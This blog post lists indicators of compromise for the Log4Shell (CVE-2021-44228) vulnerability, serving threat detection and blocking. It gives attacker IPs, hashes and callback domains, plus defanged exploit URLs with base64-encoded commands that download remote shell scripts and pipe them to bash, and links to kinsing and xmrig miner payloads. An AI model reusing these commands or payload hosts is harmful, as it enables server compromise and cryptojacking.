Open in app

Sign in

Write

Sign in

Log4Shell (LOG4J) – CVE-2021–44228 related IOCs

Miguel Jiménez
4 min readDec 11, 2021

--

Related info

GitHub - tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce: Apache Log4j 远程代码执行

Apache Log4j 远程代码执行. Contribute to tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce development by creating an account on…

github.com

https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592
https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
https://www.lunasec.io/docs/blog/log4j-zero-day/
https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/
https://www.ccn-cert.cni.es/seguridad-al-dia/alertas-ccn-cert/11435-ccn-cert-al-09-21-vulnerabilidad-en-apache-log4j-2.html

IPs

1.179.247.182
1.209.249.188
5.135.141.139
5.182.210.216
5.199.143.202
20.205.104.227
23.120.182.121
41.203.140.114
44.240.146.137
45.130.229.168
45.134.144.108
45.146.164.160
45.146.164.177
45.153.160.130
45.153.160.131
45.153.160.133
45.153.160.134
45.153.160.135
45.153.160.136
45.153.160.138
45.154.255.147
45.155.205.233
46.101.223.115
46.166.139.111
62.210.130.250
65.154.226.165
66.220.242.222
66.240.219.146
68.183.192.239
68.183.198.247
79.146.170.248
86.109.208.194
89.163.252.230
89.234.182.139
91.218.114.111
94.142.241.194
94.182.176.136
94.230.208.147
104.149.151.186
104.248.144.120
114.112.161.155
115.151.228.146
120.211.140.116
128.199.222.221
134.209.163.248
137.184.106.119
137.184.111.180
138.197.106.234
138.197.108.154
139.162.145.250
139.162.207.252
139.196.238.131
140.246.171.141
143.110.221.204
143.110.221.219
144.126.156.182
147.182.131.229
147.182.150.124
147.182.154.100
147.182.167.165
147.182.169.254
147.182.198.103
162.142.125.193
162.142.125.194
162.142.125.195
162.142.125.196
162.255.202.246
163.172.157.143
167.248.133.113
167.248.133.114
167.248.133.115
167.248.133.116
176.125.235.107
177.185.117.129
178.128.226.212
178.176.202.121
178.176.203.190
180.149.125.169
180.149.231.245
184.105.247.252
185.189.182.234
185.220.100.240
185.220.100.241
185.220.100.242
185.220.100.243
185.220.100.244
185.220.100.245
185.220.100.246
185.220.100.247
185.220.100.248
185.220.100.249
185.220.100.250
185.220.100.251
185.220.100.252
185.220.100.253
185.220.100.254
185.220.100.255
185.220.101.129
185.220.101.131
185.220.101.132
185.220.101.133
185.220.101.134
185.220.101.135
185.220.101.138
185.220.101.139
185.220.101.140
185.220.101.141
185.220.101.142
185.220.101.143
185.220.101.144
185.220.101.145
185.220.101.147
185.220.101.148
185.220.101.149
185.220.101.150
185.220.101.151
185.220.101.152
185.220.101.153
185.220.101.154
185.220.101.155
185.220.101.156
185.220.101.157
185.220.101.158
185.220.101.159
185.220.101.160
185.220.101.161
185.220.101.162
185.220.101.163
185.220.101.164
185.220.101.165
185.220.101.167
185.220.101.168
185.220.101.169
185.220.101.170
185.220.101.171
185.220.101.172
185.220.101.173
185.220.101.174
185.220.101.175
185.220.101.176
185.220.101.177
185.220.101.178
185.220.101.179
185.220.101.180
185.220.101.181
185.220.101.182
185.220.101.183
185.220.101.184
185.220.101.185
185.220.101.186
185.220.101.187
185.220.101.188
185.220.101.189
185.220.101.190
185.220.101.191
185.220.102.241
185.220.102.242
185.220.102.244
185.220.102.246
185.220.102.249
185.220.102.251
185.220.102.252
185.220.102.253
185.220.102.254
185.220.103.119
185.220.205.106
185.250.148.157
188.120.246.215
188.166.170.135
188.166.225.104
192.241.195.193
192.241.199.113
192.241.199.143
192.241.199.239
192.241.200.201
192.241.202.187
192.241.203.236
192.241.204.149
192.241.205.195
192.241.207.141
192.241.207.171
192.241.207.180
192.241.207.200
192.241.207.201
192.241.207.204
192.241.207.231
192.241.208.126
192.241.208.138
192.241.208.163
192.241.209.134
192.241.209.167
192.241.209.199
192.241.210.106
192.241.210.128
192.241.210.196
192.241.210.229
192.241.210.249
192.241.211.125
192.241.211.141
192.241.211.144
192.241.211.160
192.241.211.217
192.241.211.245
192.241.212.111
192.241.212.132
192.241.212.156
192.241.212.158
192.241.212.237
192.241.213.101
192.241.213.104
192.241.213.118
192.241.213.140
192.241.213.143
192.241.213.151
192.241.213.152
192.241.213.164
192.241.213.168
192.241.213.183
192.241.213.251
192.241.213.252
192.241.214.122
192.241.214.143
192.241.214.167
192.241.214.219
192.241.215.139
192.241.215.147
192.241.215.174
193.189.100.195
193.189.100.201
193.189.100.203
193.218.118.183
193.218.118.231
195.123.247.209
195.206.105.217
197.246.171.111
198.199.106.197
198.199.116.203
205.185.115.217
205.185.117.149
207.154.214.136
211.218.126.140
212.192.240.114
221.199.187.100
1.116.59.211
1.14.17.89
101.204.24.28
101.35.154.34
103.103.0.141
103.103.0.142
103.156.91.182
103.200.38.236
103.203.57.29
103.214.5.13
103.90.239.209
104.152.52.121
104.152.52.197
104.244.72.115
104.244.72.129
104.244.72.7
104.244.73.43
104.244.74.211
104.244.74.57
104.244.75.74
104.244.76.13
104.244.76.170
104.244.76.173
104.244.77.235
104.244.78.213
104.244.79.6
106.75.169.79
107.189.1.160
107.189.1.178
107.189.10.137
107.189.11.153
107.189.12.135
107.189.14.182
107.189.14.76
107.189.14.98
107.189.29.107
107.189.29.41
107.189.31.241
107.189.8.65
109.237.103.38
109.237.96.124
109.248.6.130
109.248.6.239
109.70.100.26
109.70.100.27
109.70.100.28
109.70.100.34
109.70.100.36
109.73.65.32
110.42.200.96
113.141.64.14
114.132.231.19
115.151.228.4
115.151.228.64
115.151.228.92
115.151.229.14
115.151.229.16
116.24.67.213
116.89.189.19
116.9.31.143
117.192.11.154
118.184.177.31
118.27.36.56
120.195.30.152
120.24.23.84
121.4.56.143
121.5.219.20
122.161.50.23
122.161.53.44
124.224.87.11
128.14.102.187
128.14.133.58
128.14.134.170
128.14.141.34
128.199.15.215
131.100.148.7
133.18.201.195
134.122.112.12
134.122.34.28
134.56.204.191
135.148.43.32
137.184.102.82
137.184.104.73
137.184.28.58
137.184.96.216
137.184.98.176
137.184.99.8
138.197.72.76
138.197.9.239
138.68.167.19
139.59.101.242
139.59.103.254
139.59.108.31
139.59.163.74
139.59.182.104
139.59.188.119
139.59.224.7
139.59.8.39
139.59.96.42
139.59.97.205
139.59.99.80
141.105.65.94
142.93.151.166
142.93.157.150
142.93.187.10
142.93.34.250
142.93.36.237
143.198.183.66
143.198.23.39
143.198.32.72
143.198.45.117
145.220.24.19
145.225.60.133
146.56.131.161
147.182.199.94
147.182.213.12
147.182.215.36
147.182.216.21
147.182.219.9
150.158.189.96
151.115.60.113
151.80.148.159
152.89.239.12
154.39.255.195
154.65.28.250
154.82.110.5
155.94.154.170
156.146.50.141
157.230.32.67
157.245.109.75
157.55.39.55
158.255.7.151
158.255.7.208
159.223.9.17
159.65.146.60
159.65.155.208
159.65.175.123
159.65.194.103
159.65.3.102
159.65.58.66
159.89.113.255
159.89.146.147
159.89.154.102
159.89.154.208
159.89.180.119
161.35.119.60
162.142.125.42
162.142.125.43
162.142.125.44
162.142.125.58
162.142.125.59
162.142.125.60
162.221.192.26
162.247.74.202
162.253.71.51
162.62.8.217
164.52.53.163
164.90.199.216
164.92.254.33
165.154.21.120
165.22.216.92
165.22.31.152
167.71.13.196
167.71.175.10
167.99.164.160
167.99.164.201
167.99.172.213
167.99.172.58
167.99.221.217
167.99.221.249
167.99.36.245
167.99.44.32
170.106.34.66
170.130.187.50
170.210.45.163
171.221.235.43
171.25.193.20
171.25.193.25
171.25.193.77
171.25.193.78
172.106.17.218
172.111.48.30
175.6.210.66
176.10.104.240
176.10.99.200
178.17.171.102
178.17.171.150
178.20.55.16
178.239.21.147
178.62.79.49
178.73.215.171
179.43.187.138
18.27.197.252
181.214.39.2
182.161.66.103
182.99.246.138
182.99.246.190
182.99.246.199
183.136.225.9
185.10.68.168
185.100.86.128
185.100.87.202
185.100.87.41
185.107.47.171
185.107.47.215
185.107.70.56
185.129.61.1
185.129.61.4
185.130.44.108
185.14.97.147
185.154.53.140
185.156.73.12
185.156.73.120
185.165.168.77
185.180.143.79
185.191.32.198
185.220.101.32
185.220.101.33
185.220.101.34
185.220.101.35
185.220.101.36
185.220.101.37
185.220.101.38
185.220.101.39
185.220.101.41
185.220.101.42
185.220.101.43
185.220.101.44
185.220.101.45
185.220.101.46
185.220.101.48
185.220.101.49
185.220.101.50
185.220.101.51
185.220.101.52
185.220.101.53
185.220.101.54
185.220.101.55
185.220.101.56
185.220.101.57
185.220.101.58
185.220.101.60
185.220.101.61
185.220.101.62
185.220.101.63
185.220.102.7
185.220.102.8
185.220.103.4
185.220.103.7
185.232.23.46
185.38.175.130
185.38.175.131
185.38.175.132
185.4.132.183
185.56.80.65
185.83.214.69
188.166.122.43
188.166.223.38
188.166.48.55
188.166.74.97
188.166.92.228
191.101.217.11
191.232.38.25
192.241.194.12
192.241.196.90
192.241.201.16
192.241.207.90
192.241.207.91
192.241.208.26
192.241.209.41
192.241.209.73
192.241.210.69
192.241.210.81
192.241.211.31
192.241.211.44
192.241.211.70
192.241.211.90
192.241.212.16
192.241.212.50
192.241.213.19
192.241.213.20
192.241.213.68
192.241.213.99
192.241.214.42
192.241.214.58
192.241.214.64
192.241.214.71
192.241.214.89
192.241.214.91
192.241.215.42
192.241.215.47
192.241.215.48
192.241.215.76
192.241.215.77
192.241.215.78
192.241.215.95
192.35.168.112
192.35.168.176
192.35.168.64
193.110.95.34
193.118.53.194
193.118.53.202
193.3.19.159
193.31.24.154
194.135.33.152
194.163.133.36
194.163.163.20
194.163.45.31
194.48.199.78
194.59.165.21
195.133.40.15
195.176.3.19
195.176.3.24
195.19.192.26
195.251.41.139
195.254.135.76
195.54.160.149
197.246.171.83
198.199.108.28
198.199.112.37
198.199.118.72
198.199.95.200
198.98.51.189
198.98.60.19
199.195.250.77
199.217.117.92
20.71.156.146
204.8.156.142
205.169.39.196
205.185.113.59
209.127.17.242
209.141.41.103
209.141.50.223
211.154.194.21
212.192.216.30
212.193.57.225
216.218.206.67
217.112.83.246
218.29.217.234
221.226.159.22
221.228.87.37
23.129.64.131
23.129.64.135
23.129.64.139
23.129.64.141
23.129.64.145
23.129.64.146
23.129.64.148
23.154.177.2
23.154.177.7
27.115.124.38
27.115.124.45
27.115.124.6
34.247.50.189
35.170.71.122
35.233.62.116
37.120.232.51
37.123.163.58
37.187.122.82
37.19.212.104
39.102.236.51
40.77.167.1
42.123.110.48
42.192.69.45
45.12.134.108
45.13.104.179
45.137.155.55
45.137.20.220
45.137.21.9
45.153.160.2
45.155.126.3
45.33.120.240
45.61.146.242
45.64.75.134
45.79.114.128
45.83.193.150
45.83.64.181
45.83.64.241
46.105.95.220
46.182.21.248
46.224.86.191
46.249.33.123
46.4.51.212
47.242.93.84
47.254.127.78
49.234.81.169
5.157.38.50
5.255.97.172
51.15.43.205
51.15.76.60
51.255.106.85
51.68.190.9
51.77.52.216
54.173.99.121
58.250.125.68
58.250.125.93
60.217.72.12
60.217.75.69
60.31.180.149
61.19.25.207
62.102.148.68
62.102.148.69
62.171.142.3
62.76.41.46
64.113.32.29
64.132.44.200
65.49.20.67
68.183.198.36
68.183.207.73
68.183.36.244
68.183.44.143
68.183.90.60
68.79.17.59
71.6.146.130
71.6.199.23
72.223.168.73
78.31.71.247
78.31.71.248
79.172.214.11
80.71.158.12
80.71.158.44
80.82.77.192
80.82.78.39
81.17.18.60
81.17.18.61
81.17.18.62
81.30.157.43
82.118.18.201
82.221.131.71
87.251.64.150
88.80.20.86
89.163.154.91
89.249.63.3
89.35.30.236
91.203.5.146
91.219.237.21
91.245.81.65
92.118.161.17
92.223.89.187
92.242.40.21

Hashes

6e25ad03103a1a972b78c642bac09060fa79c460011dc5748cbb433cc459938b
8933820cf2769f6e7f1a711e188f551c3d5d3843c52167a34ab8d6eabb0a63ef
2b794cc70cb33c9b3ae7384157ecb78b54aaddc72f4f9cf90b4a4ce4e6cf8984
776c341504769aa67af7efc5acc66c338dab5684a8579134d3f23165c7abcc00
8052f5cc4dfa9a8b4f67280a746acbc099319b9391e3b495a27d08fb5f08db81
6b9e23cb675be370a18a0c4482dc566be28920d4f1cd8ba6b4527f80acf978d3
c38c21120d8c17688f9aeb2af5bdafb6b75e1d2673b025b720e50232f888808a
0194637f1e83c2efc8bcda8d20c446805698c7bc
c927738922b87802cc75697dd99dd8c7d8cfdf1e
0fb3020e3c38de5beae21622a910754241859d42
1d1866b00f948c103a9076b39061bde5c1f68350
777c54e96d29a0ed6ddf9698c86afb74322c130f
38c56b5e1489092b80c9908f04379e5a16876f01
6feb75ac62120bae1e92ab16184c1eb0b795e4b3
ffe3dda2486083d0b26f1c64ac300923088e01df
648effa354b3cbaad87b45f48d59c616
3dfbe75871e218d08328a01c56e1bb42
1348a00488a5b3097681b6463321d84c
40e3b969906c1a3315e821a8461216bb
6d275af23910c5a31b2d9684bbb9c6f3
7bb8336eb02c878841bb63e512d6698e
3190d44bb16bf6aa3e300cd72041f43b
ccef46c7edf9131ccffc47bd69eb743b
dbc9125192bd1994cbb764f577ba5dda

URLs

hxxp://45.130.229.168:1389/Exploit
hxxp://45.137.155.55/ex.sh|sh’
hxxp://45.137.155.55/cron.sh
hxxp://45.137.155.55/kinsing
hxxp://45.137.155.55/kinsing2
hxxp://45.137.155.55/xmrig.exe
hxxp://45.137.21.9:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7Y2htb2QgK3ggbGguc2g7Li9saC5zaA==
hxxp://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC80MC44Ny4xMTEuMjA4OjQ0M3x8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC80MC44Ny4xMTEuMjA4OjQ0Myl8YmFzaA==
hxxp://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC81MC4yMDAuMTU1Ljg6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvNTAuMjAwLjE1NS44OjgwKXxiYXNo
hxxp://45.155.205.233:5874
hxxp://45.155.205.233:5874/64.132.44.200:443
hxxp://62.210.130.250/lh.sh
hxxp://62.210.130.250/web/admin/x86
hxxp://62.210.130.250/web/admin/x86_64
hxxp://62.210.130.250/web/admin/x86_g
hxxps://64.132.44.200
hxxp://185.154.53.140/get
hxxp://185.154.53.140/mg
hxxp://1aed6cba57e5.bingsearchlib.com:39356/a

Callback Domains

http443useragent.kryptoslogic-cve-2021–44228.com
bingsearchlib.com

More info: https://gist.github.com/superducktoes/9b742f7b44c71b4a0d19790228ce85d8

--

--

Miguel Jiménez

Written by Miguel Jiménez

6 Followers

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams